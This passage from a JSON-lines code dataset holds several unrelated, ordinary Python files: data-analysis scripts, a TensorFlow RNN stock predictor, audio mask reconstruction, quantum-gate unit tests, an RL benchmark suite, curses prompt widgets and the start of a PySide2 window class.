time\r\nupper=50000\r\nlower=10000\r\ni=lower\r\nfivecount=0\r\nwhile i <(upper):\r\n x=0\r\n count=0\r\n for x in range(5):\r\n y=str(i)\r\n if y[x]=='7':\r\n count+=1\r\n if count==2:\r\n fivecount+=1\r\n print(i,fivecount)\r\n i+=1\r\nprint(fivecount)\r\n","sub_path":"Allgemein_Programmieren/uni/intervall.py","file_name":"intervall.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"213338664","text":"\n# coding: utf-8\n\n# ## Introduction to the Dataset\n\n# In[3]:\n\ncsv_list = open('US_births_1994-2003_CDC_NCHS.csv').read().split('\\n')\n\n\n# In[4]:\n\ncsv_list[0:10]\n\n\n# ## Converting Data into a List of Lists\n\n# In[8]:\n\ndef read_csv(csv_file):\n f = open(csv_file).read()\n string_list = f.split('\\n')[1:]\n final_list = []\n for birth_list in string_list:\n int_fields = []\n string_fields = birth_list.split(',')\n for string in string_fields:\n int_fields.append(int(string))\n final_list.append(int_fields)\n return final_list\n\norganized_birth_data = read_csv('US_births_1994-2003_CDC_NCHS.csv')\n \n \n\n\n# In[9]:\n\norganized_birth_data[:10]\n\n\n# ## 1. Calculating the Number of Birth in Each Month\n\n# In[36]:\n\ndef month_births(births_list):\n births_per_month = {}\n for birth in births_list:\n if birth[1] not in births_per_month:\n births_per_month[birth[1]] = 0\n births_per_month[birth[1]] += birth[-1]\n return births_per_month\n\ncdc_month_births = month_births(organized_birth_data)\n\n\n# In[37]:\n\ncdc_month_births\n\n\n# ## 2. 
Calculating the Number of Births in Each Day of the Week\n\n# In[38]:\n\ndef dow_births(births_list):\n day_of_week_births = {}\n for births in births_list:\n if births[3] not in day_of_week_births:\n day_of_week_births[births[3]] = 0\n day_of_week_births[births[3]] += births[4]\n return day_of_week_births\n\ncdc_day_births = dow_births(organized_birth_data)\n\n\n# In[39]:\n\ncdc_day_births\n\n\n# ## A More General Function\n\n# In[40]:\n\ndef calc_counts(data, column):\n column_specific_birth = {}\n for births in data:\n if births[column] not in column_specific_birth:\n column_specific_birth[births[column]] = 0\n column_specific_birth[births[column]] += births[4]\n return column_specific_birth\n\ncdc_year_births = calc_counts(organized_birth_data, 0)\ncdc_month_births = calc_counts(organized_birth_data, 1)\ncdc_dom_births = calc_counts(organized_birth_data, 2)\ncdc_dow_births = calc_counts(organized_birth_data, 3)\n\n\n# In[41]:\n\ncdc_year_births\n\n\n# In[42]:\n\ncdc_month_births\n\n\n# In[43]:\n\ncdc_dom_births\n\n\n# In[44]:\n\ncdc_dow_births\n\n\n# In[ ]:\n\n\n\n","sub_path":"US+Birth+Exploration.py","file_name":"US+Birth+Exploration.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"550538433","text":"# Definition for a undirected graph node\n# class UndirectedGraphNode:\n# def __init__(self, x):\n# self.label = x\n# self.neighbors = []\n\nclass Solution:\n # @param node, a undirected graph node\n # @return a undirected graph node\n visit = {}\n def cloneGraph(self, node):\n if node == None:\n return None\n if self.visit.has_key(node):\n return self.visit[node]\n firstNode = UndirectedGraphNode(node.label)\n self.visit[node] = firstNode\n for i in xrange(len(node.neighbors)):\n firstNode.neighbors.append(self.cloneGraph(node.neighbors[i]))\n return firstNode","sub_path":"python/Clone Graph.py","file_name":"Clone Graph.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"384332511","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 1 21:34:41 2018\n\n@author: mengzhehuang\n\"\"\"\nimport numpy as np\nimport os\nimport tensorflow as tf\n# to make this notebook's output stable across runs\ndef reset_graph(seed=42):\n tf.reset_default_graph()\n tf.set_random_seed(seed)\n np.random.seed(seed)\n# To plot pretty figures\nimport matplotlib\nimport matplotlib.pyplot as plt\nplt.rcParams['axes.labelsize'] = 14\nplt.rcParams['xtick.labelsize'] = 12\nplt.rcParams['ytick.labelsize'] = 12\n\n\nimport pandas as pd\n\n# Import data\ndata = pd.read_csv('data_stocks.csv')\n# Drop date variable\ndata = data.drop(['DATE'], 1)\n# Dimensions of dataset\n#n = data.shape[0]\n#p = data.shape[1]\n# Make data a numpy array\n\nx1 = data['SP500'].values\ny = data['NASDAQ.ADP'].values\ndata = np.c_[x1, y]\n\nn = 40000\ndata = data[n:,:]\n#data = data.reshape((data.shape[0],2))\n\nimport numpy.random\n\n\nplt.title(\"SP500\", fontsize=14)\nplt.plot(data)\nplt.legend(loc=\"upper left\")\nplt.xlabel(\"Time\")\nplt.show()\n\nreset_graph()\n\nn_inputs = 2\nn_steps = 30\nn_neurons = 200\nn_h_1 = 50\nn_outputs = 2\n#\n#\ndef next_batch(num): \n data_prev = data[num-n_steps:num,:]\n data_current = data[num-n_steps+1:num+1,:]\n return data_prev.reshape(-1, n_steps, n_outputs), data_current.reshape(-1, n_steps, n_outputs)\n\n\n#indices_perm = np.random.permutation(data.shape[0] - n_steps) + 
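# The calc_counts pattern above generalizes naturally to collections.Counter;
# a minimal equivalent sketch (column indices follow the same layout as the
# parsed CDC rows, with the birth count in column 4):
from collections import Counter

def calc_counts_counter(data, column):
    counts = Counter()
    for row in data:
        counts[row[column]] += row[4]
    return dict(counts)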
n_steps\n#for it in range(indices_perm.shape[0]):\n# i = indices_perm[it]\n# data_prev, data_current = next_batch(i)\n# \n \n\nX = tf.placeholder(tf.float32, [None, n_steps, n_inputs])\ny = tf.placeholder(tf.float32, [None, n_steps, n_outputs])\n\n\n\ncell = tf.contrib.rnn.BasicRNNCell(num_units=n_neurons, activation=tf.nn.relu)\nrnn_outputs, states = tf.nn.dynamic_rnn(cell, X, dtype=tf.float32)\n\nlearning_rate = 0.001\n\nstacked_rnn_outputs = tf.reshape(rnn_outputs, [-1, n_neurons])\nstacked_outputs_1 = tf.layers.dense(stacked_rnn_outputs, n_h_1)\nstacked_outputs_2 = tf.layers.dense(stacked_outputs_1, n_outputs)\noutputs = tf.reshape(stacked_outputs_2, [-1, n_steps, n_outputs])\n\nloss = tf.reduce_mean(tf.square(outputs - y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntraining_op = optimizer.minimize(loss)\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\n\nn_iterations = 2\nbatch_size = 1\n\nwith tf.Session() as sess:\n init.run()\n for iteration in range(n_iterations):\n indices_perm = np.random.permutation(data.shape[0] - n_steps) + n_steps\n for it in range(indices_perm.shape[0]):\n i = indices_perm[it]\n X_batch, y_batch = next_batch(i)\n sess.run(training_op, feed_dict={X: X_batch, y: y_batch})\n if it % 100 == 0:\n mse = loss.eval(feed_dict={X: X_batch, y: y_batch})\n print(it, \"\\tMSE:\", mse)\n saver.save(sess, \"./my_time_series_NASDAQ_ADP_0410\")\n\nwith tf.Session() as sess: # not shown in the book\n saver.restore(sess, \"./my_time_series_NASDAQ_ADP_0410\") # not shown\n indices_perm = np.random.permutation(data.shape[0] - n_steps) + n_steps\n# index = indices_perm[0]\n# t_new = t[index-n_steps+1:index+1]\n X_new, y_test = next_batch(i)\n# X_new = time_series(np.array(t_instance[:-1].reshape(-1, n_steps, n_inputs)))\n y_pred = sess.run(outputs, feed_dict={X: X_new})\n\n\nplt.plot(y_test[0,:,0], \"b-\", markersize=10, label=\"groundtruth\")\nplt.plot(y_pred[0,:,0], \"r-\", markersize=10, label=\"prediction\")\nplt.xlabel(\"Time\")\nplt.ylabel(\"x1\")\nplt.legend(loc=\"upper right\")\nplt.show()\n\nplt.plot(y_test[0,:,1], \"b-\", markersize=10, label=\"groundtruth\")\nplt.plot(y_pred[0,:,1], \"r-\", markersize=10, label=\"prediction\")\nplt.xlabel(\"Time\")\nplt.ylabel(\"x1\")\nplt.legend(loc=\"upper right\")\nplt.show()","sub_path":"RNN_predict_SP500_and_NASDAQADP_0410.py","file_name":"RNN_predict_SP500_and_NASDAQADP_0410.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"428561090","text":"import math\n\nclass ANG:\n def __init__(self):\n self.ANGC = 0.0\n self.PSCT1=0.0\n self.PSCT2=0.0\n\n def ANGCUT(self):\n self.ANGC=1\n self.PSCT2=self.PSCT1\n if self.PSCT1 <=1:\n return self.ANGC\n API = math.acos(-1)\n RADS = 2/API\n CNS = self.PSCT1-0.5\n THETAC = math.asin(2*math.sqrt(CNS-CNS**2))\n FAC =(1-math.cos(THETAC)/(math.sin(THETAC)**2))\n self.PSCT2 = (CNS*FAC)+0.5\n self.ANGC = THETAC*RADS\n\n","sub_path":"src/Scripts/Python/ANG.py","file_name":"ANG.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"408787428","text":"\"\"\"@file time_anchor_deepattractornet_softmax_reconstructor.py\ncontains the reconstor class using deep attractor network with softmax maskers\"\"\"\n\nimport mask_reconstructor\nimport numpy as np\nimport os\n\n\nclass 
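# A small numpy illustration of the one-step-shifted windows that
# next_batch() above extracts: X covers steps t-n_steps..t-1 and y covers
# t-n_steps+1..t, so y is simply X shifted forward by one step (toy data only):
import numpy as np

series = np.arange(10.0).reshape(-1, 1)
n_steps, i = 3, 5
X_window = series[i - n_steps:i]          # rows 2, 3, 4
y_window = series[i - n_steps + 1:i + 1]  # rows 3, 4, 5
assert (X_window[1:] == y_window[:-1]).all()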
TimeAnchorReadHeadsDeepattractorSoftmaxReconstructor(mask_reconstructor.MaskReconstructor):\n\t\"\"\"the deepattractor softmax reconstructor class with time-dependent anchors, the read heads decide on the speaker\n\tassignments.\n\n\ta reconstructor using deep attractor netwerk with softmax maskers with time-dependent anchors, the read heads decide\n\t on the speaker assignments\"\"\"\n\trequested_output_names = ['bin_emb', 'anchors', 'read_heads']\n\n\tdef __init__(self, conf, evalconf, dataconf, rec_dir, task, optimal_frame_permutation=False):\n\t\t\"\"\"TimeAnchorDeepattractorSoftmaxReconstructor constructor\n\n\t\tArgs:\n\t\tconf: the reconstructor configuration as a dictionary\n\t\tevalconf: the evaluator configuration as a ConfigParser\n\t\tdataconf: the database configuration\n\t\trec_dir: the directory where the reconstructions will be stored\n\t\ttask: task name\n\t\t\"\"\"\n\n\t\tsuper(TimeAnchorReadHeadsDeepattractorSoftmaxReconstructor, self).__init__(\n\t\t\tconf, evalconf, dataconf, rec_dir, task, optimal_frame_permutation)\n\n\t\tif 'normalize' in conf and conf['normalize'] == 'True':\n\t\t\tself.normalize = True\n\t\telse:\n\t\t\tself.normalize = False\n\n\t\t# # directory where cluster centroids will be stored\n\t\t# self.center_store_dir = os.path.join(rec_dir, 'cluster_centers')\n\t\t# if not os.path.isdir(self.center_store_dir):\n\t\t# \tos.makedirs(self.center_store_dir)\n\n\tdef _get_masks(self, output, utt_info):\n\t\t\"\"\"estimate the masks\n\n\t\tArgs:\n\t\t\toutput: the output of a single utterance of the neural network\n\t\t\t\t\ttensor of dimension [Txfeature_dimension*emb_dim]\n\n\t\tReturns:\n\t\t\tthe estimated masks\"\"\"\n\n\t\tembeddings = output['bin_emb']\n\t\tanchors = output['anchors']\n\t\tread_heads = output['read_heads']\n\n\t\t# Get number of time frames and frequency cells\n\t\tT, out_dim = np.shape(embeddings)\n\t\t# Calculate the used embedding dimension\n\t\temb_dim = np.shape(anchors)[-1]\n\t\tF = out_dim/emb_dim\n\n\t\tif np.shape(embeddings)[0] != T:\n\t\t\traise Exception('Number of frames in embeddings does not match the sequence length')\n\n\t\t# reshape the outputs\n\t\toutput = embeddings[:T, :]\n\t\t# output_resh is a N times emb_dim matrix with the embedding vectors for all cells\n\t\toutput_resh = np.reshape(output, [T, F, emb_dim])\n\t\tif self.normalize:\n\t\t\toutput_resh /= (np.linalg.norm(output_resh, axis=-1, keepdims=True) + 1e-12)\n\n\t\tprod_1 = np.matmul(anchors, np.transpose(output_resh, [0, 2, 1])) # dim: T x nrS x F\n\t\ttmp = np.exp(prod_1)\n\t\tmasks_S = tmp / (np.sum(tmp, axis=1, keepdims=True) + 1e-12)\n\n\t\tmasks_Stot = np.matmul(np.transpose(masks_S, [0, 2, 1]), read_heads) # dim: (T x F x nrSmax)\n\n\t\t# reconstruct the masks from the cluster labels\n\t\tmasks_Stot = np.transpose(masks_Stot, [2, 0, 1])\n\t\t# np.save(os.path.join(self.center_store_dir, utt_info['utt_name']), anchors)\n\t\treturn masks_Stot\n","sub_path":"nabu/postprocessing/reconstructors/time_anchor_read_heads_deepattractornet_softmax_reconstructor.py","file_name":"time_anchor_read_heads_deepattractornet_softmax_reconstructor.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"344773757","text":"import unittest\nfrom math import pi\n\nimport qiskit\nfrom sympy import Symbol\nfrom zquantum.core.circuit._gate import Gate\nfrom zquantum.core.circuit._gateset import COMMON_GATES\nfrom zquantum.core.circuit._qubit import Qubit\n\nPYQUIL_IO_XFAIL = 
\"U3\"\n\n\nclass TestGate(unittest.TestCase):\n def setUp(self):\n self.two_qubit_gates = [\"CNOT\", \"CZ\", \"CPHASE\", \"SWAP\", \"ISWAP\"]\n self.one_parameter_gates = [\"PHASE\", \"Rx\", \"Ry\", \"Rz\", \"CPHASE\"]\n self.three_parameter_gates = [\"U3\"]\n\n def create_gate(self, gate_name, qubit_indices=[0, 1], params=None):\n if gate_name in self.two_qubit_gates:\n qubit_list = [Qubit(qubit_indices[0]), Qubit(qubit_indices[1])]\n else:\n qubit_list = [Qubit(qubit_indices[0])]\n if params is None:\n params = []\n if gate_name in self.one_parameter_gates:\n params = [1.0]\n if gate_name in self.three_parameter_gates:\n params = [1.0, 2.0, 3.0]\n gate = Gate(gate_name, qubits=qubit_list, params=params)\n return gate\n\n def create_gate_with_symbolic_params(self, gate_name, qubit_indices=[0, 1]):\n if gate_name in self.two_qubit_gates:\n qubit_list = [Qubit(qubit_indices[0]), Qubit(qubit_indices[1])]\n else:\n qubit_list = [Qubit(qubit_indices[0])]\n params = []\n if gate_name in self.one_parameter_gates:\n params = [Symbol(\"theta_0\")]\n gate = Gate(gate_name, qubits=qubit_list, params=params)\n return gate, params\n\n def test_evaluate_works_with_regular_gate(self):\n\n for gate_name in self.one_parameter_gates:\n # Given\n gate = self.create_gate(gate_name)\n symbols_map = [(Symbol(\"theta_0\"), 1.0)]\n\n # When\n evaluated_regular_gate = gate.evaluate(symbols_map)\n\n # Then\n self.assertEqual(evaluated_regular_gate, gate)\n\n def test_evaluate_works_with_symbolic_gate(self):\n\n for gate_name in self.one_parameter_gates:\n # Given\n param_value = 1.0\n gate = self.create_gate(gate_name, params=[param_value])\n symbolic_gate, params = self.create_gate_with_symbolic_params(gate_name)\n symbols_map = [(params[0], param_value)]\n\n # When\n evaluated_symbolic_gate = symbolic_gate.evaluate(symbols_map)\n\n # Then\n self.assertEqual(gate, evaluated_symbolic_gate)\n # Check if the params of the initial gate has not been overwritten\n self.assertEqual(symbolic_gate.params[0], symbols_map[0][0])\n\n # Given\n symbols_map = [(\"x\", 1.0)]\n\n # When\n evaluated_symbolic_gate = symbolic_gate.evaluate(symbols_map)\n\n # Then\n self.assertEqual(evaluated_symbolic_gate, symbolic_gate)\n\n def test_symbolic_params(self):\n\n # Given\n params = [0.5, Symbol(\"theta_0\"), Symbol(\"theta_0\") + 2 * Symbol(\"theta_1\")]\n target_symbolic_params = [\n [],\n [Symbol(\"theta_0\")],\n [Symbol(\"theta_0\"), Symbol(\"theta_1\")],\n ]\n\n for param, target_params in zip(params, target_symbolic_params):\n # Given\n qubit_list = [Qubit(0)]\n gate = Gate(\"Rx\", qubits=qubit_list, params=[param])\n\n # When\n symbolic_params = gate.symbolic_params\n\n # Then\n self.assertEqual(symbolic_params, target_params)\n\n def test_dict_io(self):\n for gate_name in COMMON_GATES:\n # Given\n gate = self.create_gate(gate_name)\n\n # When\n gate_dict = gate.to_dict()\n recreated_gate = Gate.from_dict(gate_dict)\n\n # Then\n self.assertEqual(gate, recreated_gate)\n\n def test_pyquil_io(self):\n for gate_name in COMMON_GATES:\n if gate_name in PYQUIL_IO_XFAIL:\n continue\n\n # Given\n gate = self.create_gate(gate_name)\n\n # When\n pyquil_gate = gate.to_pyquil()\n qubits = [\n Qubit.from_pyquil(pyquil_qubit) for pyquil_qubit in pyquil_gate.qubits\n ]\n\n recreated_gate = Gate.from_pyquil(pyquil_gate, qubits)\n\n # Then\n self.assertEqual(gate, recreated_gate)\n\n def test_cirq_io(self):\n for gate_name in COMMON_GATES:\n # Given\n gate = self.create_gate(gate_name)\n\n # When\n cirq_gate = gate.to_cirq()\n qubits = [\n 
Qubit.from_cirq(cirq_qubit, cirq_qubit.x)\n                for cirq_qubit in cirq_gate.qubits\n            ]\n            recreated_gate = Gate.from_cirq(cirq_gate, qubits)\n\n            # Then\n            self.assertEqual(gate, recreated_gate)\n\n    def test_qiskit_io(self):\n        for gate_name in COMMON_GATES:\n            # Given\n            gate = self.create_gate(gate_name)\n            qreg = qiskit.QuantumRegister(2, \"q\")\n            creg = qiskit.ClassicalRegister(2, \"c\")\n\n            # When\n            qiskit_gate, qreg, creg = gate.to_qiskit(qreg, creg)\n            recreated_gate = Gate.from_qiskit(qiskit_gate, gate.qubits)\n\n            # Then\n            self.assertEqual(gate, recreated_gate)\n\n    def test_dict_io_for_symbolic_parameters(self):\n        for gate_name in self.one_parameter_gates:\n            # Given\n            gate, _ = self.create_gate_with_symbolic_params(gate_name)\n\n            # When\n            gate_dict = gate.to_dict()\n            gate_dict_serialized = gate.to_dict(serialize_params=True)\n            recreated_gate = Gate.from_dict(gate_dict)\n            recreated_gate_from_serialized = Gate.from_dict(gate_dict_serialized)\n\n            # Then\n            self.assertEqual(gate, recreated_gate)\n            self.assertEqual(gate, recreated_gate_from_serialized)\n\n    def test_pyquil_io_for_symbolic_parameters(self):\n        for gate_name in self.one_parameter_gates:\n            # Given\n            gate, _ = self.create_gate_with_symbolic_params(gate_name)\n\n            # When\n            pyquil_gate = gate.to_pyquil()\n            qubits = [\n                Qubit.from_pyquil(pyquil_qubit) for pyquil_qubit in pyquil_gate.qubits\n            ]\n            recreated_gate = Gate.from_pyquil(pyquil_gate, qubits)\n\n            # Then\n            self.assertEqual(gate, recreated_gate)\n\n    def test_cirq_io_for_symbolic_parameters(self):\n        for gate_name in self.one_parameter_gates:\n            for param_value in [-pi, 0, pi / 2, pi, 2 * pi, 0.38553]:\n                # Given\n                gate, params = self.create_gate_with_symbolic_params(gate_name)\n                symbols_map = []\n                for param in params:\n                    symbols_map.append((param, param_value))\n\n                # When\n                cirq_gate = gate.to_cirq()\n                qubits = [\n                    Qubit.from_cirq(cirq_qubit, cirq_qubit.x)\n                    for cirq_qubit in cirq_gate.qubits\n                ]\n                recreated_gate = Gate.from_cirq(cirq_gate, qubits)\n                gate_evaluated = gate.evaluate(symbols_map)\n                recreated_gate_evaluated = recreated_gate.evaluate(symbols_map)\n\n                # Then\n                # There were numerical & sympy related issues when comparing gates\n                # directly, so in this case we compare the evaluated forms of the gates.\n                self.assertEqual(gate_evaluated, recreated_gate_evaluated)\n\n    def test_qiskit_io_for_symbolic_parameters(self):\n        for gate_name in self.one_parameter_gates:\n            # Given\n            gate, params = self.create_gate_with_symbolic_params(gate_name)\n            qreg = qiskit.QuantumRegister(2, \"q\")\n            creg = qiskit.ClassicalRegister(2, \"c\")\n\n            # When\n            qiskit_gate, qreg, creg = gate.to_qiskit(qreg, creg)\n            recreated_gate = Gate.from_qiskit(qiskit_gate, gate.qubits)\n\n            # Then\n            self.assertEqual(gate, recreated_gate)\n","sub_path":"tests/zquantum/core/circuit/_gate_test.py","file_name":"_gate_test.py","file_ext":"py","file_size_in_byte":8135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"512170014","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 3 15:48:47 2017\n\n@author: vinnam\n\"\"\"\n\ndtype = 'float64'\njitter = 1e-6\n\nUCB_a = 1\nUCB_b = 1\nUCB_r = 2\nUCB_delta = 0.1\n\nSIBO_epsilon = 0.01\nSIBO_C2 = 0.01","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"314412951","text":"import mushroom_rl_benchmark.builders\nfrom mushroom_rl_benchmark.builders import EnvironmentBuilder\nfrom mushroom_rl_benchmark.core.experiment import BenchmarkExperiment\nfrom mushroom_rl_benchmark.core.logger import BenchmarkLogger\n\n\nclass BenchmarkSuite:\n    \"\"\"\n    Class to orchestrate the execution of multiple experiments.\n    \"\"\"\n    def __init__(self, log_dir=None, log_id=None, use_timestamp=True, **run_params):\n        \"\"\"\n        Constructor.\n\n        Kwargs:\n            log_dir (str): path to the log directory (Default: ./logs or /work/scratch/$USER)\n            log_id (str): log id (Default: benchmark[_YY-mm-ddTHH:MM:SS.zzz])\n            use_timestamp (bool): select if a timestamp should be appended to the log id\n            **run_params (dict): parameters that are passed to the run method of the experiment\n        \"\"\"\n        self.experiment_structure = dict()\n        self.environment_list = []\n        self.agent_list = []\n        self.run_params = run_params\n        self.logger = BenchmarkLogger(log_dir=log_dir, log_id=log_id, use_timestamp=use_timestamp)\n\n    def add_experiment(self, environment_name, environment_builder_params, agent_name, agent_builder_params):\n        \"\"\"\n        Add an experiment to the suite.\n\n        Args:\n            environment_name (str): name of the environment for the experiment (E.g. Gym.Pendulum-v0)\n            environment_builder_params (dict): parameters for the environment builder\n            agent_name (str): name of the agent for the experiment\n            agent_builder_params (dict): parameters for the agent builder\n        \"\"\"\n        if environment_name in self.environment_list:\n            if agent_name in self.experiment_structure[environment_name]:\n                raise AttributeError('An experiment for environment {} and agent {} already exists.'.format(environment_name, agent_name))\n            else:\n                self.experiment_structure[environment_name][agent_name] = self._create_experiment(environment_name, environment_builder_params, agent_name, agent_builder_params)\n        else:\n            self.environment_list.append(environment_name)\n            self.experiment_structure[environment_name] = {agent_name: self._create_experiment(environment_name, environment_builder_params, agent_name, agent_builder_params)}\n\n        if agent_name not in self.agent_list:\n            self.agent_list.append(agent_name)\n\n    def _create_experiment(self, environment, environment_params, agent_name, agent_builder_params):\n        separator = '.'\n        if separator in environment:\n            environment_name, environment_id = environment.split(separator)\n            environment_params = dict(\n                env_id=environment_id,\n                **environment_params)\n            environment = environment.replace(separator, '_')\n        else:\n            environment_name = environment\n\n        logger = BenchmarkLogger(\n            log_dir=self.logger.get_path(),\n            log_id='{}/{}'.format(environment, agent_name),\n            use_timestamp=False\n        )\n\n        try:\n            builder = getattr(mushroom_rl_benchmark.builders, '{}Builder'.format(agent_name))\n        except AttributeError as e:\n            logger.exception(e)\n            raise  # without a valid builder the experiment cannot be constructed\n\n        agent_builder = builder.default(**agent_builder_params)\n        env_builder = EnvironmentBuilder(environment_name, environment_params)\n\n        exp = BenchmarkExperiment(agent_builder, env_builder, logger)\n\n        return exp\n\n    def print_experiments(self):\n        \"\"\"\n        Print the experiments in the suite.\n        \"\"\"\n        for env, agents in self.experiment_structure.items():\n            for agent, _ in agents.items():\n                self.logger.info('Environment: {}\\tAgent: {}'.format(env, agent))\n\n    def run(self, exec_type='sequential'):\n        \"\"\"\n        Run all experiments in the suite.\n        \"\"\"\n        for environment, agents in self.experiment_structure.items():\n            for agent, exp in agents.items():\n                self.logger.info('Starting Experiment for {} on 
{}'.format(agent, environment))\n exp.run(exec_type=exec_type, **self.run_params)\n","sub_path":"mushroom_rl_benchmark/core/suite.py","file_name":"suite.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616147066","text":"# -*- coding: utf-8 -*-\n\nimport curses\nimport copy\nfrom .question import Question\n\n\nclass MultiSelect(Question):\n \"\"\"MultiSelect\n\n :param title: a title or None\n :param opt: a list of options\n \"\"\"\n\n def __init__(self, title, opt):\n self.screen = None\n self.title = title\n self.opt = copy.deepcopy(opt) # Don't mutate the argument\n\n self.curr_pos = 0\n\n # Set offset. Offset is how many lines down the options should be printed\n # TODO Handle multi line title\n if self.title:\n self.offset = 1\n else:\n self.offset = 0\n\n def set_screen(self, screen):\n self.screen = screen\n\n def input(self, c):\n if c == \" \":\n self.opt[self.curr_pos][1] = not self.opt[self.curr_pos][1]\n elif c == curses.KEY_UP:\n if self.curr_pos != 0:\n self.curr_pos -= 1\n elif c == curses.KEY_DOWN:\n if self.curr_pos != len(self.opt) - 1:\n self.curr_pos += 1\n\n def renderer(self):\n self.screen.clear()\n\n # Add title\n if self.title:\n self.screen.addstr(0, 0, \" \" + self.title)\n\n # Add all options\n for i, value in enumerate(self.opt):\n self.screen.addstr(i + self.offset, 0, \" [\")\n if value[1]:\n self.screen.addstr(\"✓\", curses.color_pair(1))\n else:\n self.screen.addstr(\" \", curses.color_pair(1))\n self.screen.addstr(\"] \" + value[0])\n # Reverse currently selected box\n if self.opt[self.curr_pos][1]:\n self.screen.chgat(self.curr_pos + self.offset, 2, 1, curses.color_pair(1) | curses.A_REVERSE)\n else:\n self.screen.chgat(self.curr_pos + self.offset, 2, 1, curses.A_REVERSE)\n\n def answer(self):\n return self.opt\n\n\nclass Select(Question):\n \"\"\"Select\n\n :param title: a title or None\n :param opt: a list of options\n :param selected: pre-selected option\n \"\"\"\n\n def __init__(self, title, opt, selected=0):\n self.screen = None\n self.title = title\n self.opt = opt\n\n self.curr_pos = min(selected, len(opt)-1)\n\n # Set offset. 
Offset is how many lines down the options should be printed\n if self.title:\n self.offset = 1\n else:\n self.offset = 0\n\n def set_screen(self, screen):\n self.screen = screen\n\n def input(self, c):\n if c == curses.KEY_UP:\n if self.curr_pos != 0:\n self.curr_pos -= 1\n elif c == curses.KEY_DOWN:\n if self.curr_pos != len(self.opt) - 1:\n self.curr_pos += 1\n\n def renderer(self):\n self.screen.clear()\n\n # Add title\n if self.title:\n self.screen.addstr(0, 0, \" \" + self.title)\n\n # Add all options\n for i, value in enumerate(self.opt):\n self.screen.addstr(i + self.offset, 0, \" \")\n if i == self.curr_pos:\n self.screen.addstr(value, curses.A_REVERSE)\n else:\n self.screen.addstr(value)\n\n def answer(self):\n return self.opt[self.curr_pos]\n\n\nclass Text(Question):\n\n def __init__(self, text, prompt, is_password):\n self.screen = None\n self.text = text\n self.prompt = prompt\n self.data = \"\"\n self.is_password = is_password\n\n if self.text is None:\n self.offset = 0\n else:\n self.offset = 1\n\n def set_screen(self, screen):\n self.screen = screen\n\n def input(self, c):\n if c == curses.KEY_BACKSPACE:\n self.data = self.data[:-1]\n elif type(c) is str:\n self.data = self.data + c\n\n def renderer(self):\n self.screen.clear()\n curses.curs_set(True)\n\n if self.text is not None:\n self.screen.addstr(0, 0, \" \" + self.text)\n\n self.screen.addstr(self.offset, 0, \" \")\n if self.is_password:\n self.screen.addstr(self.prompt + \": \")\n else:\n self.screen.addstr(self.prompt + \": \" + self.data)\n\n def answer(self):\n curses.curs_set(False)\n return self.data\n\n\nclass YesNo(Question):\n \"\"\"YesNo\n\n :param prompt: a question\n :param default: pre-selected value; True or False for yes or no respectively\n \"\"\"\n\n def __init__(self, prompt, default=False):\n self.screen = None\n self.prompt = prompt\n self.res = default\n\n def set_screen(self, screen):\n self.screen = screen\n\n def input(self, c):\n if c == curses.KEY_LEFT:\n self.res = True\n elif c == curses.KEY_RIGHT:\n self.res = False\n\n def renderer(self):\n self.screen.clear()\n\n self.screen.addstr(0, 0, \" \" + self.prompt + \": \")\n\n if self.res:\n self.screen.addstr(\"Yes\", curses.color_pair(1) | curses.A_REVERSE)\n self.screen.addstr(\" \")\n self.screen.addstr(\"No\", curses.color_pair(2))\n else:\n self.screen.addstr(\"Yes\", curses.color_pair(1))\n self.screen.addstr(\" \")\n self.screen.addstr(\"No\", curses.color_pair(2) | curses.A_REVERSE)\n\n def answer(self):\n return self.res\n\n\nclass Print(Question):\n \"\"\"Print\n \n :param text: text to print\n \"\"\"\n\n def __init__(self, text):\n self.screen = None\n self.text = text\n\n def set_screen(self, screen):\n self.screen = screen\n\n def input(self, c):\n pass\n\n def renderer(self):\n self.screen.clear()\n\n self.screen.addstr(0, 0, \" \" + self.text)\n\n def answer(self):\n return None\n","sub_path":"cursesinquirer/builtins.py","file_name":"builtins.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"26506488","text":"import sys\nfrom PySide2.QtWidgets import QApplication, QMainWindow,QLabel, QPushButton, QAction\nfrom PySide2.QtGui import QIcon, QPixmap, QFont\nfrom PySide2.QtCore import QSize\nimport requests\n\nclass ShowDenWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"RaidBattle-Den\")\n self._width = 750\n self._height = 750\n self.setFixedSize(self._width, self._height)\n self.initUI()\n 
